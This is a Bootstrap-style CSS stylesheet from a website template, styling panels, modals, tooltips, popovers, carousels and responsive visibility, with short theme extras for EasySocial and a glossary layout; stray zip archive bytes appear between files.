  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child {
  border-top-left-radius: -1px;
  border-top-right-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child {
  border-top-left-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child {
  border-top-right-radius: -1px;
}
.panel > .table:last-child,
.panel > .table-responsive:last-child > .table:last-child {
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child {
  border-bottom-left-radius: -1px;
  border-bottom-right-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child {
  border-bottom-left-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child {
  border-bottom-right-radius: -1px;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive,
.panel > .table + .panel-body,
.panel > .table-responsive + .panel-body {
  border-top: 1px solid #dddddd;
}
.panel > .table > tbody:first-child > tr:first-child th,
.panel > .table > tbody:first-child > tr:first-child td {
  border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
  border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
  border-left: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
  border-right: 0;
}
.panel > .table-bordered > thead > tr:first-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > td,
.panel > .table-bordered > tbody > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > td,
.panel > .table-bordered > thead > tr:first-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > th,
.panel > .table-bordered > tbody > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > th {
  border-bottom: 0;
}
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th {
  border-bottom: 0;
}
.panel > .table-responsive {
  border: 0;
  margin-bottom: 0;
}
.panel-group {
  margin-bottom: 20px;
}
.panel-group .panel {
  margin-bottom: 0;
  border-radius: 0px;
}
.panel-group .panel + .panel {
  margin-top: 5px;
}
.panel-group .panel-heading {
  border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse > .panel-body,
.panel-group .panel-heading + .panel-collapse > .list-group {
  border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
  border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
  border-bottom: 1px solid #dddddd;
}
.panel-default {
  border-color: #dddddd;
}
.panel-default > .panel-heading {
  color: #444444;
  background-color: #f5f5f5;
  border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #dddddd;
}
.panel-default > .panel-heading .badge {
  color: #f5f5f5;
  background-color: #444444;
}
.panel-default > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #dddddd;
}
.panel-primary {
  border-color: #cc0000;
}
.panel-primary > .panel-heading {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #cc0000;
}
.panel-primary > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #cc0000;
}
.panel-primary > .panel-heading .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.panel-primary > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #cc0000;
}
.panel-success {
  border-color: #d6e9c6;
}
.panel-success > .panel-heading {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #d6e9c6;
}
.panel-success > .panel-heading .badge {
  color: #dff0d8;
  background-color: #468847;
}
.panel-success > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #d6e9c6;
}
.panel-info {
  border-color: #bce8f1;
}
.panel-info > .panel-heading {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #bce8f1;
}
.panel-info > .panel-heading .badge {
  color: #d9edf7;
  background-color: #3a87ad;
}
.panel-info > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #bce8f1;
}
.panel-warning {
  border-color: #faebcc;
}
.panel-warning > .panel-heading {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #faebcc;
}
.panel-warning > .panel-heading .badge {
  color: #fcf8e3;
  background-color: #c09853;
}
.panel-warning > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #faebcc;
}
.panel-danger {
  border-color: #ebccd1;
}
.panel-danger > .panel-heading {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ebccd1;
}
.panel-danger > .panel-heading .badge {
  color: #f2dede;
  background-color: #b94a48;
}
.panel-danger > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ebccd1;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
  padding: 24px;
  border-radius: 0px;
}
.well-sm {
  padding: 9px;
  border-radius: 0px;
}
.close {
  float: right;
  font-size: 21px;
  font-weight: bold;
  line-height: 1;
  color: #000000;
  text-shadow: 0 1px 0 #ffffff;
  opacity: 0.2;
  filter: alpha(opacity=20);
}
.close:hover,
.close:focus {
  color: #000000;
  text-decoration: none;
  cursor: pointer;
  opacity: 0.5;
  filter: alpha(opacity=50);
}
button.close {
  padding: 0;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
}

.modal-open {
  overflow: hidden;
}
.modal {
  display: none;
  overflow: hidden;
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1050;
  -webkit-overflow-scrolling: touch;
  outline: 0;
}
.modal.fade .modal-dialog {
  -webkit-transform: translate(0, -25%);
  -ms-transform: translate(0, -25%);
  -o-transform: translate(0, -25%);
  transform: translate(0, -25%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  -o-transform: translate(0, 0);
  transform: translate(0, 0);
}
.modal-open .modal {
  overflow-x: hidden;
  overflow-y: auto;
}
.modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
}
.modal-content {
  position: relative;
  background-color: #ffffff;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0px;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  background-clip: padding-box;
  outline: 0;
}
.modal-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1040;
  background-color: #000000;
}
.modal-backdrop.fade {
  opacity: 0;
  filter: alpha(opacity=0);
}
.modal-backdrop.in {
  opacity: 0.5;
  filter: alpha(opacity=50);
}
.modal-header {
  padding: 20px;
  border-bottom: 1px solid #e5e5e5;
  min-height: 21.42857143px;
}
.modal-header .close {
  margin-top: -2px;
}
.modal-title {
  margin: 0;
  line-height: 1.42857143;
}
.modal-body {
  position: relative;
  padding: 20px;
}
.modal-footer {
  padding: 20px;
  text-align: right;
  border-top: 1px solid #e5e5e5;
}
.modal-footer .btn + .btn {
  margin-left: 5px;
  margin-bottom: 0;
}
.modal-footer .btn-group .btn + .btn {
  margin-left: -1px;
}
.modal-footer .btn-block + .btn-block {
  margin-left: 0;
}
.modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}
@media (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
  .modal-sm {
    width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg {
    width: 900px;
  }
}
.tooltip {
  position: absolute;
  z-index: 1030;
  display: block;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 12px;
  font-weight: normal;
  line-height: 1.4;
  opacity: 0;
  filter: alpha(opacity=0);
}
.tooltip.in {
  opacity: 0.9;
  filter: alpha(opacity=90);
}
.tooltip.top {
  margin-top: -3px;
  padding: 5px 0;
}
.tooltip.right {
  margin-left: 3px;
  padding: 0 5px;
}
.tooltip.bottom {
  margin-top: 3px;
  padding: 5px 0;
}
.tooltip.left {
  margin-left: -3px;
  padding: 0 5px;
}
.tooltip-inner {
  max-width: 350px;
  padding: 3px 8px;
  color: #ffffff;
  text-align: center;
  text-decoration: none;
  background-color: #000000;
  border-radius: 0px;
}
.tooltip-arrow {
  position: absolute;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.tooltip.top .tooltip-arrow {
  bottom: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-left .tooltip-arrow {
  bottom: 0;
  right: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-right .tooltip-arrow {
  bottom: 0;
  left: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.right .tooltip-arrow {
  top: 50%;
  left: 0;
  margin-top: -5px;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
}
.tooltip.left .tooltip-arrow {
  top: 50%;
  right: 0;
  margin-top: -5px;
  border-width: 5px 0 5px 5px;
  border-left-color: #000000;
}
.tooltip.bottom .tooltip-arrow {
  top: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-left .tooltip-arrow {
  top: 0;
  right: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-right .tooltip-arrow {
  top: 0;
  left: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.popover {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 1010;
  display: none;
  max-width: 276px;
  padding: 1px;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: left;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0px;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  white-space: normal;
}
.popover.top {
  margin-top: -10px;
}
.popover.right {
  margin-left: 10px;
}
.popover.bottom {
  margin-top: 10px;
}
.popover.left {
  margin-left: -10px;
}
.popover-title {
  margin: 0;
  padding: 8px 14px;
  font-size: 14px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: -1px -1px 0 0;
}
.popover-content {
  padding: 9px 14px;
}
.popover > .arrow,
.popover > .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover > .arrow {
  border-width: 11px;
}
.popover > .arrow:after {
  border-width: 10px;
  content: "";
}
.popover.top > .arrow {
  left: 50%;
  margin-left: -11px;
  border-bottom-width: 0;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  bottom: -11px;
}
.popover.top > .arrow:after {
  content: " ";
  bottom: 1px;
  margin-left: -10px;
  border-bottom-width: 0;
  border-top-color: #ffffff;
}
.popover.right > .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-left-width: 0;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
}
.popover.right > .arrow:after {
  content: " ";
  left: 1px;
  bottom: -10px;
  border-left-width: 0;
  border-right-color: #ffffff;
}
.popover.bottom > .arrow {
  left: 50%;
  margin-left: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
  top: -11px;
}
.popover.bottom > .arrow:after {
  content: " ";
  top: 1px;
  margin-left: -10px;
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover.left > .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-right-width: 0;
  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
}
.popover.left > .arrow:after {
  content: " ";
  right: 1px;
  border-right-width: 0;
  border-left-color: #ffffff;
  bottom: -10px;
}
.carousel {
  position: relative;
}
.carousel-inner {
  position: relative;
  overflow: hidden;
  width: 100%;
}
.carousel-inner > .item {
  display: none;
  position: relative;
  -webkit-transition: 0.6s ease-in-out left;
  -o-transition: 0.6s ease-in-out left;
  transition: 0.6s ease-in-out left;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  line-height: 1;
}
@media all and (transform-3d), (-webkit-transform-3d) {
  .carousel-inner > .item {
    -webkit-transition: -webkit-transform 0.6s ease-in-out;
    -moz-transition: -moz-transform 0.6s ease-in-out;
    -o-transition: -o-transform 0.6s ease-in-out;
    transition: transform 0.6s ease-in-out;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    -webkit-perspective: 1000;
    -moz-perspective: 1000;
    perspective: 1000;
  }
  .carousel-inner > .item.next,
  .carousel-inner > .item.active.right {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.prev,
  .carousel-inner > .item.active.left {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.next.left,
  .carousel-inner > .item.prev.right,
  .carousel-inner > .item.active {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    left: 0;
  }
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
  display: block;
}
.carousel-inner > .active {
  left: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
  position: absolute;
  top: 0;
  width: 100%;
}
.carousel-inner > .next {
  left: 100%;
}
.carousel-inner > .prev {
  left: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
  left: 0;
}
.carousel-inner > .active.left {
  left: -100%;
}
.carousel-inner > .active.right {
  left: 100%;
}
.carousel-control {
  position: absolute;
  top: 0;
  left: 0;
  bottom: 0;
  width: 15%;
  opacity: 0.5;
  filter: alpha(opacity=50);
  font-size: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-control.left {
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
}
.carousel-control.right {
  left: auto;
  right: 0;
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
}
.carousel-control:hover,
.carousel-control:focus {
  outline: 0;
  color: #ffffff;
  text-decoration: none;
  opacity: 0.9;
  filter: alpha(opacity=90);
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
  position: absolute;
  top: 50%;
  z-index: 5;
  display: inline-block;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
  left: 50%;
  margin-left: -10px;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
  right: 50%;
  margin-right: -10px;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
  width: 20px;
  height: 20px;
  margin-top: -10px;
  line-height: 1;
  font-family: serif;
}
.carousel-control .icon-prev:before {
  content: '\2039';
}
.carousel-control .icon-next:before {
  content: '\203a';
}
.carousel-indicators {
  position: absolute;
  bottom: 10px;
  left: 50%;
  z-index: 15;
  width: 60%;
  margin-left: -30%;
  padding-left: 0;
  list-style: none;
  text-align: center;
}
.carousel-indicators li {
  display: inline-block;
  width: 10px;
  height: 10px;
  margin: 1px;
  text-indent: -999px;
  border: 1px solid #ffffff;
  border-radius: 10px;
  cursor: pointer;
  background-color: #000 \9;
  background-color: rgba(0, 0, 0, 0);
}
.carousel-indicators .active {
  margin: 0;
  width: 12px;
  height: 12px;
  background-color: #ffffff;
}
.carousel-caption {
  position: absolute;
  left: 15%;
  right: 15%;
  bottom: 20px;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-caption .btn {
  text-shadow: none;
}
@media screen and (min-width: 768px) {
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-prev,
  .carousel-control .icon-next {
    width: 30px;
    height: 30px;
    margin-top: -15px;
    font-size: 30px;
  }
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .icon-prev {
    margin-left: -15px;
  }
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-next {
    margin-right: -15px;
  }
  .carousel-caption {
    left: 20%;
    right: 20%;
    padding-bottom: 30px;
  }
  .carousel-indicators {
    bottom: 20px;
  }
}

.clearfix:before,
.clearfix:after,
.container:before,
.container:after,
.container-fluid:before,
.container-fluid:after,
.row:before,
.row:after,
.form-horizontal .form-group:before,
.form-horizontal .form-group:after,
.btn-toolbar:before,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after,
.nav:before,
.nav:after,
.navbar:before,
.navbar:after,
.navbar-header:before,
.navbar-header:after,
.navbar-collapse:before,
.navbar-collapse:after,
.pager:before,
.pager:after,
.panel-body:before,
.panel-body:after,
.modal-footer:before,
.modal-footer:after {
  content: " ";
  display: table;
}
.clearfix:after,
.container:after,
.container-fluid:after,
.row:after,
.form-horizontal .form-group:after,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:after,
.nav:after,
.navbar:after,
.navbar-header:after,
.navbar-collapse:after,
.pager:after,
.panel-body:after,
.modal-footer:after {
  clear: both;
}
.center-block {
  display: block;
  margin-left: auto;
  margin-right: auto;
}
.pull-right {
  float: right !important;
}
.pull-left {
  float: left !important;
}
.hide {
  display: none !important;
}
.show {
  display: block !important;
}
.invisible {
  visibility: hidden;
}
.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {
  display: none !important;
}
.affix {
  position: fixed;
}
@-ms-viewport {
  width: device-width;
}
.visible-xs,
.visible-sm,
.visible-md,
.visible-lg {
  display: none !important;
}
.visible-xs-block,
.visible-xs-inline,
.visible-xs-inline-block,
.visible-sm-block,
.visible-sm-inline,
.visible-sm-inline-block,
.visible-md-block,
.visible-md-inline,
.visible-md-inline-block,
.visible-lg-block,
.visible-lg-inline,
.visible-lg-inline-block {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-xs {
    display: block !important;
  }
  table.visible-xs {
    display: table;
  }
  tr.visible-xs {
    display: table-row !important;
  }
  th.visible-xs,
  td.visible-xs {
    display: table-cell !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-block {
    display: block !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline {
    display: inline !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm {
    display: block !important;
  }
  table.visible-sm {
    display: table;
  }
  tr.visible-sm {
    display: table-row !important;
  }
  th.visible-sm,
  td.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-block {
    display: block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline {
    display: inline !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md {
    display: block !important;
  }
  table.visible-md {
    display: table;
  }
  tr.visible-md {
    display: table-row !important;
  }
  th.visible-md,
  td.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-block {
    display: block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline {
    display: inline !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg {
    display: block !important;
  }
  table.visible-lg {
    display: table;
  }
  tr.visible-lg {
    display: table-row !important;
  }
  th.visible-lg,
  td.visible-lg {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-block {
    display: block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline {
    display: inline !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline-block {
    display: inline-block !important;
  }
}
@media (max-width: 767px) {
  .hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-lg {
    display: none !important;
  }
}
.visible-print {
  display: none !important;
}
@media print {
  .visible-print {
    display: block !important;
  }
  table.visible-print {
    display: table;
  }
  tr.visible-print {
    display: table-row !important;
  }
  th.visible-print,
  td.visible-print {
    display: table-cell !important;
  }
}
.visible-print-block {
  display: none !important;
}
@media print {
  .visible-print-block {
    display: block !important;
  }
}
.visible-print-inline {
  display: none !important;
}
@media print {
  .visible-print-inline {
    display: inline !important;
  }
}
.visible-print-inline-block {
  display: none !important;
}
@media print {
  .visible-print-inline-block {
    display: inline-block !important;
  }
}
@media print {
  .hidden-print {
    display: none !important;
  }
}PKԜ�\=[����9purity_iii/local/css/themes/red/extras/com_easysocial.cssnu&1i�.com_easysocial .es-toolbar .es-navbar-search .search-query::-moz-placeholder {
  color: #ffffff;
}
.com_easysocial .stream-meta {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .es-stream-meta .es-stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .dropdown-menu > li {
  border: 0;
}
.com_easysocial #es .app-news .checkbox input[type="checkbox"] {
  position: relative;
  margin-left: 0;
}
#es .o-nav--block {
  white-space: normal;
}
.es {
  clear: both;
}PKԜ�\���|qq:purity_iii/local/css/themes/red/extras/layout_glossary.cssnu&1i�.glossary-nav {
  position: relative;
  z-index: 10;
  margin-bottom: 40px;
}
.glossary-nav nav {
  padding: 0;
}
.glossary-nav nav.affix {
  top: auto;
  position: relative;
}
.glossary-nav nav .nav-pills {
  background: #fff;
}
.glossary-nav nav .nav-pills > li {
  display: block;
  float: left;
  margin: 0 1px 10px 0;
}
.glossary-nav nav .nav-pills > li > a {
  background: #444444;
  color: #eeeeee;
  font-size: 18px;
  font-weight: 600;
  line-height: normal;
  padding: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
  text-align: center;
  text-transform: uppercase;
}
.glossary-nav nav .nav-pills > li > a:hover,
.glossary-nav nav .nav-pills > li > a:active,
.glossary-nav nav .nav-pills > li > a:focus {
  background: #cc0000;
  color: #fff;
}
@media screen and (min-width: 991px) {
  .glossary-nav nav.affix {
    top: 57px;
    position: fixed;
  }
  .glossary-nav nav .nav-pills > li > a {
    font-size: 24px;
  }
}
.glossary-group {
  margin-bottom: 40px;
  position: relative;
}
.glossary-group a[name] {
  position: absolute;
  top: -120px;
}
.glossary-group-title {
  background: #f7f7f7;
  color: #222222;
  font-weight: 600;
  font-size: 35px;
  margin: 0 0 20px;
  padding: 15px;
  text-transform: uppercase;
}
.glossary-group-items ul {
  padding: 0;
  margin: 0;
}
.glossary-group-items ul > li {
  list-style: none;
  padding: 0;
}
.glossary-group-items ul > li > a {
  color: #444444;
  display: block;
  font-size: 18px;
  padding: 5px 15px;
}
.glossary-group-items ul > li > a:hover,
.glossary-group-items ul > li > a:active,
.glossary-group-items ul > li > a:focus {
  color: #cc0000;
  text-decoration: none;
